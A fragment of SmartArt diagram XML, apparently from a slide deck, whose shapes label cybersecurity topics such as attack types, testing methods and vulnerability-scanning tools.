          <a:off x="5099761" y="2427062"/>
          <a:ext cx="4932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93234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4047" y="2423553"/>
        <a:ext cx="24661" cy="24661"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{15486DDF-0DCA-40A0-B85F-71CA7A341155}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5592996" y="2127612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Grey Box</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5611054" y="2145670"/>
        <a:ext cx="1857486" cy="580427"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D209804C-82E3-4D16-BD3E-5043FB14BBC2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="3310531">
          <a:off x="4914523" y="2781574"/>
          <a:ext cx="86371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63711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4785" y="2768804"/>
        <a:ext cx="43185" cy="43185"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0EBAAB39-99C7-4000-8B09-79AED95A3961}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5592996" y="2836637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White Box</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5611054" y="2854695"/>
        <a:ext cx="1857486" cy="580427"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ED9D0F85-1789-462F-B716-4A32DDBF2842}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="20413970">
          <a:off x="2058410" y="3224715"/>
          <a:ext cx="5241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24118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7366" y="3220434"/>
        <a:ext cx="26205" cy="26205"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{18B0B436-DFF0-443A-B454-3951E93BFE65}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2567086" y="2836637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CTF</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2585144" y="2854695"/>
        <a:ext cx="2496558" cy="580427"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{57892FF8-06DC-407C-BAEC-97F3D5650AFD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="2829178">
          <a:off x="1957819" y="3579228"/>
          <a:ext cx="72529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25299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2336" y="3569917"/>
        <a:ext cx="36264" cy="36264"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DBEA359D-F7CF-44F4-9112-5C88BC291B0B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2567086" y="3545662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SRC</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2585144" y="3563720"/>
        <a:ext cx="2496558" cy="580427"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CC11C599-C803-4420-99D8-252E8D6D0B8E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="4099285">
          <a:off x="1652852" y="3933740"/>
          <a:ext cx="13352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35234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7088" y="3909181"/>
        <a:ext cx="66761" cy="66761"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{225DA1DF-41AE-4E98-9DB0-CD54059D7130}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2567086" y="4254687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Offensive&amp; defensive</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2585144" y="4272745"/>
        <a:ext cx="2496558" cy="580427"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29815692-6FA6-4945-954C-D03C6926B1CE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5099761" y="4554137"/>
          <a:ext cx="4932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93234" y="882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4047" y="4550628"/>
        <a:ext cx="24661" cy="24661"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1D088FA6-36B5-4333-AA38-13B9F0BA1AF0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5592996" y="4254687"/>
          <a:ext cx="1893602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HVV</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5611054" y="4272745"/>
        <a:ext cx="1857486" cy="580427"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{370B5853-25E9-47ED-ABB8-CE16876609B7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="4548241">
          <a:off x="1314850" y="4288253"/>
          <a:ext cx="20112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11237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270188" y="4246794"/>
        <a:ext cx="100561" cy="100561"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{585B5B27-256E-4580-8941-AA443DB0B13F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2567086" y="4963712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APT</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2585144" y="4981770"/>
        <a:ext cx="2496558" cy="580427"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{34149222-6F68-4A65-AA10-4DE0D16793F1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="4769441">
          <a:off x="968366" y="4642765"/>
          <a:ext cx="270420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04206" y="882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52864" y="4583982"/>
        <a:ext cx="135210" cy="135210"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A3F28E14-CD8C-41ED-96B5-4DDACACFB563}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2567086" y="5672738"/>
          <a:ext cx="2532674" cy="616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Vulnerability research</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2585144" y="5690796"/>
        <a:ext cx="2496558" cy="580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B0ECF-FBCA-4EF4-87DE-A26BCB5CA7EB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="599288" y="3006140"/>
          <a:ext cx="1585468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Black Hat</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="621143" y="3027995"/>
        <a:ext cx="1541758" cy="702477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B4981CEF-30B1-4A0D-B1FD-88D6BC12B4BB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="17132988">
          <a:off x="1369834" y="2295207"/>
          <a:ext cx="22267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26793" y="11381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427561" y="2250919"/>
        <a:ext cx="111339" cy="111339"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E9A0F98F-FA6F-4908-970A-618C03AC6C0F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2781706" y="860852"/>
          <a:ext cx="2193536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Cyber Attacks</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2803561" y="882707"/>
        <a:ext cx="2149826" cy="702477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7992B851-B5F0-429F-A3AB-DADF3F5ACD11}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="18289469">
          <a:off x="4751053" y="793506"/>
          <a:ext cx="1045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45327" y="11381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7584" y="778754"/>
        <a:ext cx="52266" cy="52266"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{31050248-0321-4BF5-9B0E-695C1854C337}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5572192" y="2736"/>
          <a:ext cx="1693068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Trojan &amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0"/>
            <a:t>Viruses</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5594047" y="24591"/>
        <a:ext cx="1649358" cy="702477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C4407181-6CAA-4C46-8D09-9C85C4CE7D1E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4975242" y="1222563"/>
          <a:ext cx="5969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96949" y="11381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793" y="1219021"/>
        <a:ext cx="29847" cy="29847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7F8E279C-C324-413A-89D1-40B23768AD1D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5572192" y="860852"/>
          <a:ext cx="1693068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Worms</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5594047" y="882707"/>
        <a:ext cx="1649358" cy="702477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C632D2DF-FC39-4FD9-BBD1-D584FD20C0DA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="3310531">
          <a:off x="4751053" y="1651621"/>
          <a:ext cx="1045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45327" y="11381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7584" y="1636870"/>
        <a:ext cx="52266" cy="52266"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29D34CF3-3388-40A4-832C-DC20DC9E9956}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5572192" y="1718967"/>
          <a:ext cx="1693068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malware</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5594047" y="1740822"/>
        <a:ext cx="1649358" cy="702477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{62DC10CC-D66F-4594-8922-371E2020748B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="19457599">
          <a:off x="2115658" y="3153322"/>
          <a:ext cx="73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5145" y="11381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852" y="3146326"/>
        <a:ext cx="36757" cy="36757"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{568E57E0-C733-4092-8890-C7902E5BE3F2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2781706" y="2577082"/>
          <a:ext cx="2193536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Botnet</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2803561" y="2598937"/>
        <a:ext cx="2149826" cy="702477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0E9AA53C-0E78-42D7-B835-DC6BF6CE04DA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4975242" y="2938794"/>
          <a:ext cx="5969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96949" y="11381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793" y="2935252"/>
        <a:ext cx="29847" cy="29847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{28BD9F96-0DE1-43F1-B7A9-179691BD1622}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5572192" y="2577082"/>
          <a:ext cx="1693068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DDOS</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5594047" y="2598937"/>
        <a:ext cx="1649358" cy="702477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{999AB59A-175F-4997-8068-D19D92722A9B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="2142401">
          <a:off x="2115658" y="3582380"/>
          <a:ext cx="73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5145" y="11381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852" y="3575383"/>
        <a:ext cx="36757" cy="36757"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{96F366B4-E5F1-454F-9162-628AEAFFC3FE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2781706" y="3435197"/>
          <a:ext cx="2193536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Ransomware</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2803561" y="3457052"/>
        <a:ext cx="2149826" cy="702477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3887D84D-9B4D-45B2-80C8-67174D6FAAC0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="3907178">
          <a:off x="1773801" y="4011438"/>
          <a:ext cx="14188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18859" y="11381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7759" y="3987348"/>
        <a:ext cx="70942" cy="70942"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9CD688AA-885B-4D97-B526-F6A813F6D1EB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2781706" y="4293312"/>
          <a:ext cx="2193536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Phishing</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2803561" y="4315167"/>
        <a:ext cx="2149826" cy="702477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E3A06A66-8C6E-4985-A688-51ABA6CAEE98}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="4467012">
          <a:off x="1369834" y="4440495"/>
          <a:ext cx="22267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26793" y="11381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427561" y="4396207"/>
        <a:ext cx="111339" cy="111339"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C4A099BF-99DE-4E43-B704-65C75A5EB1D5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2781706" y="5151427"/>
          <a:ext cx="2193536" cy="746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Stealing Information</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2803561" y="5173282"/>
        <a:ext cx="2149826" cy="702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EE09D-CF03-49D3-9A80-9E0807295655}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3045210"/>
          <a:ext cx="1884409" cy="66697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Application</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="19535" y="3064745"/>
        <a:ext cx="1845339" cy="627902"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B3870EF8-E226-491B-9A8D-94118E972F77}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="17163366">
          <a:off x="1001613" y="2196059"/>
          <a:ext cx="244061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440614" y="993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60905" y="2144976"/>
        <a:ext cx="122030" cy="122030"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5B449135-50FA-411A-87E6-68D99E38F9AD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2559431" y="699801"/>
          <a:ext cx="1333944" cy="666972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Code</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2578966" y="719336"/>
        <a:ext cx="1294874" cy="627902"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{578A1F8F-3F21-48E0-8D25-47F5C1D40915}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="20504168">
          <a:off x="3837419" y="675251"/>
          <a:ext cx="22215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21505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92634" y="629646"/>
        <a:ext cx="111075" cy="111075"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7FC66FAE-C244-4164-ACF9-1145EAA02552}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6002968" y="3595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DAST</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6022503" y="23130"/>
        <a:ext cx="1936368" cy="627902"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{15743FAC-CDA0-4807-84D0-9CF449EB3DB7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="115351">
          <a:off x="3892781" y="1058760"/>
          <a:ext cx="211078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110781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95402" y="1015924"/>
        <a:ext cx="105539" cy="105539"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D9DC7C6E-269E-45F4-9B11-92C91577A108}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6002968" y="770613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SAST</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6022503" y="790148"/>
        <a:ext cx="1936368" cy="627902"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9E44E81F-97C9-4D59-BFC0-94C643CAEEAF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="1299638">
          <a:off x="3813233" y="1442269"/>
          <a:ext cx="226987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69877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891425" y="1395455"/>
        <a:ext cx="113493" cy="113493"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D073EF64-4864-42E2-A8C9-21FEEB6DC9A9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6002968" y="1537631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Penetration test</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6022503" y="1557166"/>
        <a:ext cx="1936368" cy="627902"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DC000199-A63A-4F6D-B581-DB2D573A58A1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="21374432">
          <a:off x="1883682" y="3346586"/>
          <a:ext cx="67647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76476" y="993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5008" y="3339607"/>
        <a:ext cx="33823" cy="33823"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{50209067-CD63-48B2-8845-7E70BB001747}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2559431" y="2818338"/>
          <a:ext cx="2159322" cy="1032006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Dependencies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Framework Components</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2589657" y="2848564"/>
        <a:ext cx="2098870" cy="971554"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3C5F23ED-AA36-464D-9A6F-A6690E507040}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="20504168">
          <a:off x="4662797" y="2976305"/>
          <a:ext cx="22215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21505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18012" y="2930701"/>
        <a:ext cx="111075" cy="111075"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4D2EEDFA-04C0-48F4-B658-670B00005E2B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6828346" y="2304649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Dependabot</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6847881" y="2324184"/>
        <a:ext cx="1936368" cy="627902"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7F58302C-D8DF-446D-8B8D-88EDFDFCFDF9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="115351">
          <a:off x="4718159" y="3359814"/>
          <a:ext cx="211078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110781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20780" y="3316978"/>
        <a:ext cx="105539" cy="105539"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DA0D96BB-B642-42EB-80EF-D6B63A6C3235}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6828346" y="3071667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Prisma Cloud</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6847881" y="3091202"/>
        <a:ext cx="1936368" cy="627902"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5DF7F94C-15CC-444B-BBC4-3BC3DE82C086}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="1299638">
          <a:off x="4638611" y="3743323"/>
          <a:ext cx="226987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69877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16803" y="3696509"/>
        <a:ext cx="113493" cy="113493"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ACE4F60C-9D42-4E10-8D50-7E110D2E1C2A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6828346" y="3838685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AWS ECR scan</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6847881" y="3858220"/>
        <a:ext cx="1936368" cy="627902"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{515476AD-CB98-4717-A892-CE1AE84F5D72}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="4210974">
          <a:off x="1226368" y="4305358"/>
          <a:ext cx="199110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91103" y="993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172142" y="4265514"/>
        <a:ext cx="99555" cy="99555"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{943F440C-FD04-493E-8B4E-11F22D5A36E2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2559431" y="4815163"/>
          <a:ext cx="1685198" cy="873446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Environment OS </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="1200" dirty="0"/>
            <a:t>database</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"/>
            <a:t> Middleware</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2585013" y="4840745"/>
        <a:ext cx="1634034" cy="822282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BF9D6DFE-67EF-4C52-8A57-414AA73D9276}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="21094120">
          <a:off x="4233105" y="5085605"/>
          <a:ext cx="213264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132642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246110" y="5042222"/>
        <a:ext cx="106632" cy="106632"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7C08C730-988A-41AA-AC4B-9AC1651F017F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6354223" y="4605704"/>
          <a:ext cx="2043176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Qualys</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6373758" y="4625239"/>
        <a:ext cx="2004106" cy="627902"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{625375CF-4568-4416-947D-B1F3149B538E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="729215">
          <a:off x="4220446" y="5469114"/>
          <a:ext cx="215795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157959" y="993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245477" y="5425098"/>
        <a:ext cx="107897" cy="107897"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2C5B2CE4-B3C5-4EE6-ABD2-5F3C6A5B337A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6354223" y="5372722"/>
          <a:ext cx="1975438" cy="66697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Kenna</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6373758" y="5392257"/>
        <a:ext cx="1936368" cy="6279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61137-81B2-4ECE-AB25-522714A6B5C0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4937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41862D-8759-499E-BE04-DD513795BC59}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
